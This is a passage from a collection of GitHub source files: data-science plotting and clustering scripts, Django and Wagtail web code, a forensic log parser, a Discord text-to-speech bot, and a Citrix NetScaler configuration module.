numpy as np\n\nfrom DataGenerator import generateData\nfrom Preprocessing import transfromFeaturesToNoiseRandomly\n\nfrom settings import (NUMBER_OF_CLASSES, NUMBER_OF_FEATURES,\n NUMBER_OF_RECORDS_PER_CLASS,\n FEATURE_MEAN_RANGE, RANDOM_NUMBER_SEED,\n NUMBER_OF_FEATURES_TO_PRUNE, TEST_SIZE_PERCENTAGE,\n NOISE_MEAN, NOISE_STD)\n\nOPACITY = 0.7\n\nnp.random.seed(RANDOM_NUMBER_SEED)\n\ndata, labels = generateData(NUMBER_OF_CLASSES, NUMBER_OF_FEATURES,\n NUMBER_OF_RECORDS_PER_CLASS, FEATURE_MEAN_RANGE,\n RANDOM_NUMBER_SEED)\nprunedtrainData = transfromFeaturesToNoiseRandomly(data, labels,\n NUMBER_OF_FEATURES_TO_PRUNE,\n NOISE_MEAN, NOISE_STD,\n randomNumberSeed=RANDOM_NUMBER_SEED)\n\nX_train, X_test, y_train, y_test = train_test_split(prunedtrainData, labels,\n test_size=TEST_SIZE_PERCENTAGE)\n\ndistincttrainLabels = np.unique(labels)\n\n# PLOT\n\nplt.figure()\nplt.title(\"Data Set\")\nplt.xlabel(\"Feature 1\")\nplt.ylabel(\"Feature 2\")\nfor i, label in enumerate(distincttrainLabels):\n plt.scatter(X_train[y_train==label,0], X_train[y_train==label,1],\n c=np.random.rand(3,), alpha=OPACITY,\n label=\"Class {}\".format(i))\n\nplt.legend()\n\npca = PCA()\npcaTrainData = pca.fit_transform(X_train)\n\nplt.figure()\nplt.title(\"Feature Selection With PCA\")\nplt.xlabel(\"PC1\")\nplt.ylabel(\"PC2\")\nfor i, label in enumerate(distincttrainLabels):\n plt.scatter(pcaTrainData[y_train==label,0], pcaTrainData[y_train==label,1],\n c=np.random.rand(3,), alpha=OPACITY,\n label=\"Class {}\".format(i))\n\nplt.legend()\n","repo_name":"edforsberg/MMV440_project3","sub_path":"PCA-Main.py","file_name":"PCA-Main.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"9757972844","text":"# 亲和力传播聚类\nfrom numpy import unique\nfrom numpy import where\nfrom sklearn.datasets import make_classification\nfrom sklearn.cluster import AffinityPropagation\nfrom matplotlib import pyplot\n\n# 生成数据集\n\"\"\"\nmake_classification函数\nsklearn.datasets.make_classification(n_samples=100, n_features=20, *, n_informative=2, n_redundant=2, n_repeated=0, n_classes=2, n_clusters_per_class=2, weights=None, flip_y=0.01, class_sep=1.0, hypercube=True, shift=0.0, scale=1.0, shuffle=True, random_state=None)\n\n参数\t类型\t默认值\t含义\nn_samples\tint\t100\t样本数量\nn_features\tint\t20\t特征总数。这些包括n_informative 信息特征、n_redundant冗余特征、 n_repeated重复特征和 n_features-n_informative-n_redundant-n_repeated随机抽取的无用特征。\nn_informative\tint\t2\t信息特征的数量。\nn_redundant\tint\t2\t冗余特征的数量。这些特征是作为信息特征的随机线性组合生成的。(假设n_informative=F1,F2,…那么n_redundant= aF1+bF2+… a,b,c就是随机数)\nn_repeated\tint\t0\t从信息特征和冗余特征中随机抽取的重复特征的数量。\nn_classes\tint\t2\t分类问题的类(或标签)数。\nn_clusters_per_class\tint\t2\t每个类的集群数。\nrandom_state\tint\tNone\t类似随机种子,复现随机数\n\"\"\"\nX, _ = make_classification(n_samples=1000, n_features=2, n_informative=2, n_redundant=0, n_clusters_per_class=1,\n random_state=4)\n\n# 定义模型.Affinity Propagation聚类算法简称AP.\n# 2007年Brendan J Frey和Delbert Dueck发表于Science期刊。\n# AP算法思想是,网络中所有样本点作为节点,通过节点间传递归属度和吸引度两类信息来计算聚类中心,\n# 迭代计算出最优的数个聚类中心,并将剩余节点划分到相应的类中。\n\n'''\nAffinityPropagation(damping=0.5, max_iter=200, convergence_iter=15, copy=True, preference=None, affinity=’euclidean’, verbose=False)\n\n函数参数\n\n damping : float, optional, default: 0.5,阻尼系数,默认值0.5\n\n max_iter : int, optional, default: 200,最大迭代次数,默认值是200\n\n convergence_iter : int, optional, default: 15,在停止收敛的估计集群数量上没有变化的迭代次数。默认15\n\n copy : boolean, optional, default: True,布尔值,可选,默认为true,即允许对输入数据的复制\n\n preference : array-like, shape 
(n_samples,) or float, optional,近似数组,每个点的偏好 - 具有较大偏好值的点更可能被选为聚类的中心点。 簇的数量,即集群的数量受输入偏好值的影响。 如果该项未作为参数,则选择输入相似度的中位数作为偏好\n\n affinity : string, optional, default=``euclidean``目前支持计算预欧几里得距离。 即点之间的负平方欧氏距离。\n\n verbose : boolean, optional, default: False\n'''\n\nmodel = AffinityPropagation(preference=-600, damping=0.7)\n# 匹配模型\nmodel.fit(X)\n\nprint(X)\n# 为每个示例分配一个集群\nyhat = model.predict(X)\n# 检索唯一群集\nclusters = unique(yhat)\n# 为每个群集的样本创建散点图\nfor cluster in clusters:\n # 获取此群集的示例的行索引\n row_ix = where(yhat == cluster)\n print(cluster)\n print(row_ix)\n\n # 创建这些样本的散布\n pyplot.scatter(X[row_ix, 0], X[row_ix, 1])\n # 绘制散点图\npyplot.show()\n","repo_name":"pitifulboy/machinelearning","sub_path":"1128.py","file_name":"1128.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30899452269","text":"from cms.models.pages import (\n BlogIndexPage, EventIndexPage, HomePage, IndexPage, NewsIndexPage,\n PastEventIndexPage, RichTextPage, StrandPage, _paginate, TagResults\n)\nfrom django.test import RequestFactory, TestCase\nfrom wagtail.tests.utils import WagtailPageTests\n\n\nclass TestPages(TestCase):\n\n def test__paginate(self):\n items = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]\n\n factory = RequestFactory()\n\n request = factory.get('/test?page=1')\n self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=2')\n self.assertEqual([10, 11, 12, 13, 14, 15, 16, 17],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=10')\n self.assertEqual([10, 11, 12, 13, 14, 15, 16, 17],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=a')\n self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n _paginate(request, items).object_list)\n\n\nclass TestHomePage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(\n HomePage, {\n BlogIndexPage,\n EventIndexPage,\n IndexPage,\n NewsIndexPage,\n PastEventIndexPage,\n RichTextPage,\n StrandPage,\n TagResults\n })\n\n\nclass TestIndexPage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(IndexPage, {IndexPage, RichTextPage})\n\n\nclass TestRichTextPage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(RichTextPage, {})\n","repo_name":"kingsdigitallab/languageacts-django","sub_path":"cms/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"23828219680","text":"from django.shortcuts import render, HttpResponse\nfrom django.views import generic\nfrom rest_framework import generics\nfrom .serializers import OrderSerializer, VueOrderSerializer, UploadFileSerializer\nfrom .models import Orders, VueOrders, UploadFiles\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.http import JsonResponse\n\n\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\", {})\n\nclass HomePage(generic.View):\n\n def get(self, *args, **kwargs):\n\n context = {\n\n }\n\n\n return render(self.request, \"index.html\", context)\n\n def post(self, *args, **kwargs):\n pass\n\nclass OrderUpload(generic.CreateView):\n model = 
Orders\n    fields = [\"topic\", \"pages\", \"style\", \"subject\", \"amount\", \"instructions\", \"uploads\"]\n    template_name = \"order_Upload.html\"\n\n\nclass OrderList(generics.ListCreateAPIView):\n    queryset = Orders.objects.all()\n    serializer_class = OrderSerializer\n\n\nclass OrderDetail(generics.RetrieveUpdateDestroyAPIView):\n    queryset = Orders.objects.all()\n    serializer_class = OrderSerializer\n\nclass OrderdetailApi(generics.ListCreateAPIView):\n    queryset = VueOrders.objects.all()\n    serializer_class = VueOrderSerializer \n\n    def create(self, request):\n        print(request.data)\n\n        deadline = request.data[\"body\"][\"deadline\"]\n        Type = request.data[\"body\"][\"type\"]\n        pages = request.data[\"body\"][\"pages\"]\n        service = request.data[\"body\"][\"service\"]\n        checkbox = request.data[\"body\"][\"checkbox\"]\n        language = request.data[\"body\"][\"language\"]\n        level = request.data[\"body\"][\"level\"]\n\n        qs = self.queryset.create(\n            deadline= deadline,\n            Type = Type,\n            pages = pages,\n            service =service,\n            fin_earl = checkbox,\n            language = language,\n            Level = level \n            \n        )\n\n\n        data = {\n            \"posted\": True,\n            \"qs\": qs.id\n        }\n        return JsonResponse(data)\n\nclass OrderdetaildraftApi(APIView):\n    queryset = VueOrders.objects.all()\n    serializer_class = VueOrderSerializer \n\n    def put(self, request, pk):\n        print(request.data)\n\n        deadline = request.data[\"body\"][\"deadline\"]\n        Type = request.data[\"body\"][\"type\"]\n        pages = request.data[\"body\"][\"pages\"]\n        service = request.data[\"body\"][\"service\"]\n        checkbox = request.data[\"body\"][\"checkbox\"]\n        language = request.data[\"body\"][\"language\"]\n        level = request.data[\"body\"][\"level\"]\n\n        qs = self.queryset.get(id=pk)\n        qs.deadline = deadline\n        qs.Type = Type\n        qs.pages = pages\n        qs.service =service\n        qs.fin_earl = checkbox\n        qs.language = language \n        qs.Level = level\n\n        qs.save()\n        \n        data = {\n            \"posted\": True,\n            \"qs\": qs.id\n        }\n        return JsonResponse(data)\n\n\n    def get(self, request, pk):\n\n        order = self.queryset.get(id=pk)\n\n        data = {\n            \"deadline\": order.deadline,\n            \"type\": order.Type,\n            \"pages\": order.pages,\n            \"service\": order.service,\n            \"checkbox\": order.fin_earl,\n            \"language\": order.language,\n            \"level\": order.Level\n        }\n        # data = {\"form\" : form}\n\n        return JsonResponse(data)\n    \n    def delete(self, request, pk):\n        order = VueOrders.objects.get(id=pk).delete()\n        data = {\n            \"deleted\": True\n        }\n        return JsonResponse(data)\n\nclass OrderIntructionsApi(generics.ListCreateAPIView):\n    queryset = VueOrders.objects.all()\n    serializer_class = VueOrderSerializer \n\n    def create(self, request, pk):\n        print(request.data)\n\n        pk_id = request.data[\"body\"][\"id\"]\n        topic = request.data[\"body\"][\"form\"][\"topic\"]\n        sources = request.data[\"body\"][\"form\"][\"sources\"]\n        style = request.data[\"body\"][\"form\"][\"style\"]\n        subject = request.data[\"body\"][\"form\"][\"subject\"]\n        instructions = request.data[\"body\"][\"form\"][\"instructions\"]\n\n        \n        try:\n\n            qs = self.queryset.get(id=pk)\n            qs.topic = topic\n            qs.sources = sources\n            qs.style = style\n            qs.subject = subject\n            qs.instructions = instructions\n            qs.save()\n            \n\n            data = {\n                \"posted\": True\n            }\n        except:\n\n            data = {\n                \"posted\": False\n            }\n\n        \n\n        return JsonResponse(data)\n\n\n    def get(self, request, pk):\n\n        order = self.queryset.get(id=pk)\n\n        data = {\n            \"topic\" :order.topic,\n            \"sources\" :order.sources,\n            \"style\" :order.style,\n            \"subject\":order.subject,\n            \"instructions\":order.instructions\n        }\n        # data = {\"form\" : form}\n\n        return 
JsonResponse(data)\n    \n    def delete(self, request, pk):\n        order = VueOrders.objects.get(id=pk).delete()\n        data = {\n            \"deleted\": True\n        }\n        return JsonResponse(data)\n\n\n\ndef serializer(img):\n    img_se = {\n        'file':img.files.name,\n        'main': img.main\n    }\n    return img_se\n\nclass OrderUploadApi(APIView):\n    queryset = UploadFiles.objects.all()\n\n    serializer_class = UploadFileSerializer\n\n    def post(self, request,pk):\n        print(request.data)\n        data = request.data\n        fies = []\n        order = VueOrders.objects.get(id=pk)\n\n\n        file_name = data.keys()\n\n        for img in file_name:\n            img = data[img]\n            print(img)\n            uploads = self.queryset.create(files = img)\n            order.files.add(uploads)\n\n        order.save()\n\n        data = {\n\n            \"posted\": True\n        }\n\n        return JsonResponse(data)\n\n\n    def get(self, request, pk):\n        order = VueOrders.objects.get(id=pk)\n        images = order.files.all()\n        serialized = [serializer(img) for img in images ]\n        data = {\n\n            \"order\" : serialized\n        }\n\n        return JsonResponse(data)\n    \n    def delete(self, request, pk):\n        order = VueOrders.objects.get(id=pk).delete()\n        data = {\n            \"deleted\": True\n        }\n        return JsonResponse(data)\n\n\nclass HelloView(APIView):\n    \n    permission_classes = (IsAuthenticated,)\n\n    def get(self, request):\n        content = {'message': 'Hello, World!'}\n        return Response(content)\n\n","repo_name":"vmisiko/Essaygenius","sub_path":"EssayGenius/Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"27777518881","text":"import os\nimport textwrap\nimport xml.etree.ElementTree as ET\n\nfrom scripts.artifact_report import ArtifactHtmlReport\nfrom scripts.cleapfuncs import logfunc, logdevinfo, tsv, timeline, is_platform_windows, get_next_unused_name, open_sqlite_db_readonly, get_browser_name\n\ndef get_paloAltoGlobalProtect(files_found, report_folder, seeker, wrap_text):\n    for file_found in files_found:\n        data_list = []\n        file_found = str(file_found)\n        if 'pan_gp_hrpt.xml' in file_found.lower():\n            tree = ET.parse(file_found)\n            root = tree.getroot()\n            for elem in root.iter():\n                if elem.text is not None and '\\t' not in elem.text and '\\n' not in elem.text:\n                    data_list.append((elem.tag, elem.text))\n            \n            if len(data_list) > 0:\n                report = ArtifactHtmlReport('Palo Alto Global Protect Hip Report')\n                report.start_artifact_report(report_folder, 'Palo Alto Global Protect Hip Report')\n                report.add_script()\n                data_headers = ('Key','Value')\n                report.write_artifact_data_table(data_headers, data_list, file_found, html_escape=False)\n                report.end_artifact_report()\n\n                tsvname = 'Palo Alto Global Protect Hip Report'\n                tsv(report_folder, data_headers, data_list, tsvname)\n\n            else:\n                logfunc('No Palo Alto Global Protect Hip Report Data available')\n\n        if 'pan_gp_event.log' in file_found.lower():\n            with open(file_found, \"r\") as logfile:\n                for line in logfile:\n                    logline = line.split(\"[\")\n                    data_list.append((logline[0], \"[\" + logline[1]))\n\n            if len(data_list) > 0:\n                report = ArtifactHtmlReport('Palo Alto Global Protect Event Log')\n                report.start_artifact_report(report_folder, 'Palo Alto Global Protect Event Log')\n                report.add_script()\n                data_headers = ('Date/Time', 'Event Message')\n                report.write_artifact_data_table(data_headers, data_list, file_found, html_escape=False)\n                report.end_artifact_report()\n\n                tsvname = 'Palo Alto Global Protect Event Log'\n                tsv(report_folder, data_headers, data_list, tsvname)\n\n            else:\n                logfunc('No Palo Alto Global Protect Event Log Data 
available')\n\n","repo_name":"markmckinnon/cLeapp","sub_path":"scripts/artifacts/paloAltoGlobalProtect.py","file_name":"paloAltoGlobalProtect.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"8077419641","text":"import logging\nfrom typing import List\n\nfrom pipeline.component_framework.component import Component\nfrom pipeline.core.flow.activity import Service\n\nimport backend.flow.utils.name_service.name_service_dataclass as flow_context\nfrom backend.db_services.plugin.nameservice import clb, polaris\nfrom backend.flow.plugins.components.collections.common.base_service import BaseService\n\nlogger = logging.getLogger(\"json\")\n\n\nclass ExecNameServiceOperation(BaseService):\n \"\"\"\n NameServiceCreate服务\n \"\"\"\n\n def _execute(self, data, parent_data) -> bool:\n \"\"\"\n 执行创建名字服务功能的函数\n global_data 单据全局变量,格式字典\n kwargs 私有变量\n \"\"\"\n\n # 从流程节点中获取变量\n kwargs = data.get_one_of_inputs(\"kwargs\")\n name_service_operation_type = kwargs[\"name_service_operation_type\"]\n trans_data = data.get_one_of_inputs(\"trans_data\")\n creator = kwargs[\"creator\"]\n cluster_id = kwargs[\"cluster_id\"]\n\n if trans_data is None or trans_data == \"${trans_data}\":\n # 表示没有加载上下文内容,则在此添加\n trans_data = getattr(flow_context, kwargs[\"set_trans_data_dataclass\"])()\n\n # 执行功能\n # clb创建\n if name_service_operation_type == \"create_clb\":\n res = clb.create_lb_and_register_target(cluster_id=cluster_id)\n # polaris创建\n elif name_service_operation_type == \"create_polaris\":\n res = polaris.create_service_alias_bind_targets(cluster_id=cluster_id)\n # clb删除\n elif name_service_operation_type == \"delete_clb\":\n res = clb.deregister_target_and_delete_lb(cluster_id=cluster_id)\n # polaris删除\n elif name_service_operation_type == \"delete_polaris\":\n res = polaris.unbind_targets_delete_alias_service(kwargs[\"cluster_id\"])\n # clb信息写入meta\n elif name_service_operation_type == \"add_clb_info_to_meta\":\n res = clb.add_clb_info_to_meta(output=trans_data, cluster_id=cluster_id, creator=creator)\n # 从meta删除clb信息\n elif name_service_operation_type == \"delete_clb_info_from_meta\":\n res = clb.delete_clb_info_from_meta(output=trans_data, cluster_id=cluster_id)\n # polaris信息写入meta\n elif name_service_operation_type == \"add_polaris_info_to_meta\":\n res = polaris.add_polaris_info_to_meta(output=trans_data, cluster_id=cluster_id, creator=creator)\n # 从meta删除polaris信息\n elif name_service_operation_type == \"delete_polaris_info_from_meta\":\n res = polaris.delete_polaris_info_from_meta(output=trans_data, cluster_id=cluster_id)\n # 添加clb域名到dns,clb域名信息写入meta\n elif name_service_operation_type == \"add_clb_domain_to_dns\":\n res = clb.add_clb_domain_to_dns(cluster_id=cluster_id, creator=creator)\n # 从dns删除clb域名,从meta中删除clb域名信息\n elif name_service_operation_type == \"delete_clb_domain_from_dns\":\n res = clb.delete_clb_domain_from_dns(cluster_id=cluster_id)\n # 主域名绑定clb ip\n elif name_service_operation_type == \"domain_bind_clb_ip\":\n res = clb.immute_domain_clb_ip(cluster_id=cluster_id, creator=creator, bind=True)\n # 主域名解绑clb ip\n elif name_service_operation_type == \"domain_unbind_clb_ip\":\n res = clb.immute_domain_clb_ip(cluster_id=cluster_id, creator=creator, bind=False)\n else:\n self.log_error(\"{} does not support error!\".format(name_service_operation_type))\n return False\n\n # 定义流程节点输出参数值\n trans_data = res\n if res[\"code\"] == 0:\n self.log_info(\"task:{} execute 
successfully\".format(name_service_operation_type))\n data.outputs[\"trans_data\"] = trans_data\n return True\n\n self.log_error(\"task:{} execute fail, error:{}\".format(name_service_operation_type, res[\"message\"]))\n return False\n\n # 流程节点输入参数\n def inputs_format(self) -> List:\n return [\n Service.InputItem(name=\"kwargs\", key=\"kwargs\", type=\"dict\", required=True),\n Service.InputItem(name=\"global_data\", key=\"global_data\", type=\"dict\", required=True),\n ]\n\n\nclass ExecNameServiceOperationComponent(Component):\n \"\"\"\n ExecNameServiceOperation组件\n \"\"\"\n\n name = __name__\n code = \"name_service_operation\"\n bound_service = ExecNameServiceOperation\n","repo_name":"TencentBlueKing/blueking-dbm","sub_path":"dbm-ui/backend/flow/plugins/components/collections/name_service/name_service.py","file_name":"name_service.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"27"} +{"seq_id":"29413549984","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n \n dummy = ListNode()\n cur = dummy\n \n heap = []\n for ind, node in enumerate(lists):\n if node:\n heapq.heappush(heap, (node.val, ind))\n \n while heap:\n least, ind = heapq.heappop(heap)\n cur.next = lists[ind]\n cur = cur.next\n lists[ind] = lists[ind].next\n if lists[ind]:\n heapq.heappush(heap, (lists[ind].val, ind))\n \n cur.next = None\n \n return dummy.next\n \n ","repo_name":"million-t/competitive-programming","sub_path":"0023-merge-k-sorted-lists/0023-merge-k-sorted-lists.py","file_name":"0023-merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18102554676","text":"import requests\r\nfrom datetime import datetime\r\n\r\ndef run_program():\r\n id_invoice = input(\"Masukkan ID Invoice: \")\r\n url = 'https://afvr.my.id/api/cek_status'\r\n data = {'id_invoice': id_invoice}\r\n\r\n headers = {'Content-type': 'application/x-www-form-urlencoded'}\r\n response = requests.post(url, headers=headers, data=data)\r\n\r\n result = response.json()\r\n\r\n if 'error' in result:\r\n print(result['error'])\r\n else:\r\n invoices = result['id_invoice']\r\n for invoice in invoices:\r\n print(\"===============================\")\r\n print(\"ID Invoice : \", invoice['id_invoice'])\r\n transaksi_tanggal = datetime.strptime(invoice['transaksi_tanggal'], '%Y-%m-%d %H:%M:%S')\r\n print(\"Tanggal : \", datetime.strftime(transaksi_tanggal, '%d %B %Y'))\r\n print(\"Jasa dipilih : \", invoice['nama_produk'])\r\n print(\"Nama Pelanggan : \", invoice['nama_konsumen'])\r\n print(\"Status : \", invoice['status_transaksi'])\r\n print(\"===============================\")\r\n\r\n command = input(\"Ketik 'jalankan' untuk menjalankan program atau 'berhenti' untuk berhenti (tekan enter jika sudah menuliskan perintah): \")\r\n if command == \"jalankan\":\r\n run_program()\r\n elif command == \"berhenti\":\r\n print(\"Program dihentikan.\")\r\n else:\r\n print(\"Perintah tidak dikenali. 
Program dihentikan.\")\r\n\r\nif __name__ == '__main__':\r\n run_program()\r\n","repo_name":"aji24ap/python-test-api-wp3","sub_path":"yo.py","file_name":"yo.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33129373415","text":"import discord\r\nfrom discord.ext import commands\r\nimport pyttsx3\r\n\r\n##initialize engine\r\nengine = pyttsx3.init()\r\n\r\n\r\n\r\nclass commandtts(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n \r\n ##tts\r\n @commands.command(aliases=[\"t\",\"speak\"])\r\n async def tts(self, ctx):\r\n ##0 ES-Helena, 1 EN-David, 2 EN-Zira, 3 EN-Hazel, 4 ES-Sabina, 5 JP-Haruka, 6 KR-Heami\r\n usrid = ctx.author.id\r\n usrname = ctx.author.name\r\n text = ctx.message.content\r\n voices = engine.getProperty('voices')\r\n rate = engine.getProperty('rate') # getting details of current speaking rate\r\n volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n\r\n print(f\"{usrname} said: {text[5:]}\")\r\n print (f\" current voice rate {rate}\") #printing current voice rate\r\n print (f\" current voice rate {volume}\")#printing current volume level\r\n\r\n engine.setProperty('voice', voices[4].id)\r\n engine.setProperty('rate', 250) # setting up new voice rate\r\n engine.setProperty('volume',1.5) # setting up volume level between 0 and 1\r\n \r\n ##if user is x set voice to helena\r\n # if usrid == exampleid:\r\n # engine.setProperty('voice', voices[0].id)\r\n \r\n\r\n\r\n ## save the mp3 file\r\n engine.save_to_file(text[5:], 'output.mp3')\r\n engine.runAndWait()\r\n #voice = discord.utils.get(client.voice_clients, guild=ctx.guild)\r\n voice = ctx.guild.voice_client\r\n voiceChannel = ctx.author.voice.channel\r\n \r\n if voice == None:\r\n await voiceChannel.connect()\r\n\r\n elif ctx.voice_client.is_playing():\r\n ctx.voice_client.stop()\r\n\r\n vc = ctx.voice_client\r\n vc.play(discord.FFmpegPCMAudio('output.mp3'), after=lambda e: print('done', e))\r\n\r\n\r\nasync def setup(bot):\r\n await bot.add_cog(commandtts(bot))","repo_name":"Ambiguousrelic/Ambidroid","sub_path":"ambibot/cogs/commandTTS.py","file_name":"commandTTS.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32974773817","text":"import copy\nimport logging\nimport os.path as op\n\nfrom ta_conf import ta_conf_task as tct\nfrom ta_util2 import configure as conf\n\n_LOGGER = logging.getLogger(\"ta_citrix_netscaler\")\n\n\nclass CitrixNetscalerConfig:\n\n app_dir = op.dirname(op.dirname(op.abspath(__file__)))\n app_file = op.join(app_dir, \"local\", \"app.conf\")\n server_file = \"citrix_netscaler_servers.conf\"\n server_file_w_path = op.join(app_dir, \"local\", server_file)\n task_file = \"inputs.conf\"\n task_file_w_path = op.join(app_dir, \"local\", task_file)\n template_file = \"citrix_netscaler_templates.conf\"\n template_file_w_path = op.join(app_dir, \"local\", template_file)\n ucs_file = \"splunk_ta_citrix_netscaler_settings.conf\"\n ucs_file_w_path = op.join(app_dir, \"local\", ucs_file)\n ucs_default_file_w_path = op.join(app_dir, \"default\", ucs_file)\n signal_file_w_path = op.join(app_dir, \"local\", \".signal\")\n\n def __init__(self, meta_configs):\n self.metas = meta_configs\n self._conf_task = tct.TAConfTask(\n self.metas,\n self.server_file,\n self.template_file,\n self.task_file,\n self.ucs_file,\n )\n\n def 
encrypt_credentials(self):\n self._conf_task.encrypt_credentials()\n\n def get_tasks(\n self, inputs, ui_input_validator_args=None, ui_input_validator_logger=None\n ):\n \"\"\"\n Generate filter task for data collection based on endpoints\n\n :param inputs: (dict object) enabled input stanzas\n :param ui_input_validator_args: (tuple object) ui input arguments\n :param ui_input_validator_logger: (object) logging object\n :return:\n \"\"\"\n\n confs = (self.server_file, self.template_file, self.task_file, self.ucs_file)\n _LOGGER.info(\"Reloading configuration files\")\n conf.reload_confs(confs, self.metas[\"session_key\"], self.metas[\"server_uri\"])\n\n tasks = self._conf_task.get_tasks(inputs)\n\n is_ui_input_warning = False\n\n if ui_input_validator_args:\n tasks, ui_task_objs = self._separate_tasks(\n tasks, ui_input_validator_args[0]\n )\n\n filtered_tasks = []\n # Filtered endpoint based on task, if one task have serveral task\n # templates, and some of them have dup class ids, clean them up to\n # avoid dup data collection\n existing_endpoints = {}\n for task in tasks:\n\n content = task[\"content\"].strip()\n if not content:\n _LOGGER.warn(\n \"No api_endpoint specified for task={}, ignoring it\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\")\n )\n )\n continue\n (\n existing_endpoints,\n api_endpoints,\n is_ui_input_warning,\n ) = self._process_api_endpoints(\n task, content, existing_endpoints, ui_logger=None\n )\n filtered_tasks += self._create_filtered_tasks(task, api_endpoints)\n\n if ui_input_validator_args:\n\n for task in ui_task_objs:\n ui_task_content = task[\"content\"].strip()\n if not ui_task_content:\n _LOGGER.warn(\n \"No api_endpoint specified for task={}, ignore it\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\")\n )\n )\n continue\n (\n existing_endpoints,\n api_endpoints,\n is_ui_input_warning,\n ) = self._process_api_endpoints(\n task,\n ui_task_content,\n existing_endpoints,\n ui_logger=ui_input_validator_logger,\n )\n\n if is_ui_input_warning:\n return True\n else:\n return False\n\n return filtered_tasks\n\n def _process_api_endpoints(self, task, content, existing_endpoints, ui_logger=None):\n \"\"\"\n It will process endpoints of the task template and produce necessary warnings regarding data duplication\n\n :param task: (dict object) input task object\n :param content: (string) string of endpoints\n :param existing_endpoints: (dict object) map for previously configured endpoints\n :param ui_logger: (object) logging object\n :return:\n \"\"\"\n\n api_endpoints = []\n unique_api_endpoints = []\n is_ui_input_warning = False\n for endpoint in content.split(\";\"):\n endpoint = endpoint.strip()\n if not endpoint:\n continue\n\n # Creating a map for keeping record of unique api endpoints\n et = task[\"server_url\"] + \"``\" + endpoint\n if et not in existing_endpoints:\n existing_endpoints[et] = (\n endpoint,\n task[\"server_url\"],\n task[\"task_template\"],\n task[\"name\"],\n )\n unique_api_endpoints.append(endpoint)\n else:\n if ui_logger:\n\n # jscpd:ignore-start\n ui_logger.warn(\n \"While saving input [ task=({}), \"\n \"template=({}), appliance url=({}) ] \"\n \"from add-on UI, found duplicate endpoint=({}) \"\n \"configuraiton with [ task=({}), template=({}), appliance_url=({}) ],\"\n \"which may cause data duplication.\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n task[\"server_url\"],\n endpoint,\n 
existing_endpoints[et][3].replace(\n \"citrix_netscaler://\", \"\"\n ),\n existing_endpoints[et][2].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n existing_endpoints[et][1],\n )\n )\n is_ui_input_warning = True\n else:\n _LOGGER.warn(\n \"While filtering [ task=({}), template=({}), appliance url=({}) ] found \"\n \"api_endpoint=({}) already specified in \"\n \"[ task=({}), template=({}), appliance url=({}) will have data duplication.\"\n \"\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n task[\"server_url\"],\n endpoint,\n existing_endpoints[et][3].replace(\n \"citrix_netscaler://\", \"\"\n ),\n existing_endpoints[et][2].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n existing_endpoints[et][1],\n )\n )\n\n api_endpoints.append(endpoint)\n # jscpd:ignore-end\n if ui_logger:\n self._generate_all_duplicate_endpoints_warning(\n task, unique_api_endpoints, ui_logger\n )\n else:\n self._generate_all_duplicate_endpoints_warning(\n task, unique_api_endpoints, _LOGGER\n )\n\n return existing_endpoints, api_endpoints, is_ui_input_warning\n\n @staticmethod\n def _separate_tasks(tasks, input_name):\n \"\"\"\n It will separate tasks in two list\n (tasks matches the input name) & (tasks which does not matches the input name)\n\n :param tasks: (list) inputs task objects\n :param input_name: (string) name of input\n :return:\n \"\"\"\n return [task for task in tasks if task[\"name\"] != input_name], [\n task for task in tasks if task[\"name\"] == input_name\n ]\n\n @staticmethod\n def _create_filtered_tasks(task, api_endpoints):\n \"\"\"\n It will create filtered objects based on endpoints list\n\n :param task: (dict object) the input task object\n :param api_endpoints: (list) 